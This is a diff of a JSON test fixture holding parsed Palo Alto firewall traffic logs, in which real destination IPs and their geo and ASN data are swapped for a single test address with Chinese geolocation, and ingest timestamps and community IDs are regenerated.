@@ -3823,7 +3822,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25022,1,58768,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25022,1,58768,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -3857,7 +3856,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Ukie7FwgRVUkTl4/hKbkxseBqj0=", + "community_id": "1:m4VFpKOzz62icW8a2e5EDKgI1zQ=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -3895,14 +3894,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284009610Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25022,1,58768,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381782600Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25022,1,58768,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -3925,27 +3924,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Westminster", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -117.9932, - "lat": 33.7518 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 20001, + "number": 4837, "organization": { - "name": "Charter Communications Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 13069, "bytes": 504, - "ip": "98.149.55.63", + "ip": "175.16.199.1", "packets": 8 }, "rule": { @@ -3964,7 +3962,7 @@ }, "packets": 8 }, - "message": "192.168.0.2,98.149.55.63,0.0.0.0,0.0.0.0,rule1,crusher,,skype,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24027,1,47752,13069,0,0,0x200000,udp,allow,1008,504,504,16,2012/04/10 04:37:50,125,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,8,8", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24027,1,47752,13069,0,0,0x200000,udp,allow,1008,504,504,16,2012/04/10 04:37:50,125,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,8,8", "panw": { "panos": { "ruleset": "rule1", @@ -3998,7 +3996,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:7+CQvC/DGk2fhUdWzglWwYXYMZE=", + "community_id": "1:ky7+S2LyyKY/u1D67FJdhpe2W6A=", "transport": "udp", "application": "skype", "type": "ipv4", 
@@ -4036,14 +4034,14 @@ ], "ip": [ "192.168.0.2", - "98.149.55.63", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 125000000000, - "ingested": "2021-09-08T12:38:09.284014858Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,98.149.55.63,0.0.0.0,0.0.0.0,rule1,crusher,,skype,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24027,1,47752,13069,0,0,0x200000,udp,allow,1008,504,504,16,2012/04/10 04:37:50,125,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,8,8", + "ingested": "2021-12-09T13:43:22.381786200Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24027,1,47752,13069,0,0,0x200000,udp,allow,1008,504,504,16,2012/04/10 04:37:50,125,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,8,8", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -4066,27 +4064,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -4105,7 +4102,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -4139,7 +4136,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:h+XKHvMK2Oz7QQvaJdhsJWE2c9E=", + "community_id": "1:AYXyX5+VIkDGOJnqe2YBg9tVR5g=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -4177,14 +4174,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284019377Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381790300Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -4207,24 +4204,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -4243,7 +4242,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26394,1,54533,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26394,1,54533,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -4277,7 +4276,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:x/kpg5sNW5nn7RkabTWPIKsvO58=", + "community_id": "1:Cd7slvnDeq7YQ4faezjJXH9pPks=", "transport": "udp", "application": "dns", "type": "ipv4", 
@@ -4315,14 +4314,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284023944Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26394,1,54533,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381795700Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26394,1,54533,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -4345,27 +4344,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "region_iso_code": "IT-MI", - "city_name": "Assago", - "country_iso_code": "IT", - "country_name": "Italy", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Italy", - "region_name": "Milan", + "region_name": "Jilin", "location": { - "lon": 9.1225, - "lat": 45.4087 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 8660, + "number": 4837, "organization": { - "name": "Italiaonline S.p.A." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 9130, - "ip": "212.48.10.58", + "ip": "175.16.199.1", "packets": 10 }, "rule": { 
@@ -4384,7 +4382,7 @@ }, "packets": 10 }, - "message": "192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24917,1,59201,80,0,0,0x200000,tcp,allow,9967,837,9130,20,2012/04/10 04:39:24,1,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,10,10", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24917,1,59201,80,0,0,0x200000,tcp,allow,9967,837,9130,20,2012/04/10 04:39:24,1,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,10,10", "panw": { "panos": { "ruleset": "rule1", @@ -4418,7 +4416,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:GL6UBrkzpi/gQHrUyqxHb1jJeUU=", + "community_id": "1:zfaYkSBxKm6iKieh06sWC2n9e70=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -4456,14 +4454,14 @@ ], "ip": [ "192.168.0.2", - "212.48.10.58", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.284032662Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:55,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24917,1,59201,80,0,0,0x200000,tcp,allow,9967,837,9130,20,2012/04/10 04:39:24,1,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,10,10", + "ingested": "2021-12-09T13:43:22.381799700Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24917,1,59201,80,0,0,0x200000,tcp,allow,9967,837,9130,20,2012/04/10 04:39:24,1,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,10,10", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -4486,27 +4484,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -4525,7 +4522,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -4559,7 +4556,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:6kV576B7jMsBLC62npA6Dgi/zMI=", + "community_id": "1:JLt9t3wJPT2YYVwyev/DS8HhBiQ=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -4597,14 +4594,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284038780Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381803500Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -4627,24 +4624,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -4663,7 +4662,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,14146,1,50876,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,14146,1,50876,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -4697,7 +4696,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:TuGe54F1FJdU+mNdTf97Ced2UmI=", + "community_id": "1:qRpdg4yASethznAesoylNuToHeo=", "transport": "udp", "application": "dns", "type": "ipv4", 
@@ -4735,14 +4734,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284043465Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,14146,1,50876,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381806800Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,14146,1,50876,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -4765,24 +4764,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -4801,7 +4802,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25876,1,57657,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25876,1,57657,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -4835,7 +4836,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:1yn57zVSr0UsUwbuL7XvzIWMbpM=", + "community_id": "1:jqcZWkGo23kJ04a2XY4ZBsEmSoY=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -4873,14 +4874,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284048251Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25876,1,57657,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381811200Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25876,1,57657,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -4903,27 +4904,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -4942,7 +4942,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -4976,7 +4976,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:22ouAyA1O0KgUQOEKP20E7gNa2U=", + "community_id": "1:GY8jhTkAcplSQMn+CC7/azIV2gs=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -5014,14 +5014,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284052911Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381816600Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -5044,27 +5044,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -5083,7 +5082,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -5117,7 +5116,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:phQpgsVhj3YxNYzeNkqdzDgcMCg=", + "community_id": "1:5JhT/ZcbuwDQS34hGqhKf01RQ34=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -5155,14 +5154,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284057489Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381822Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": 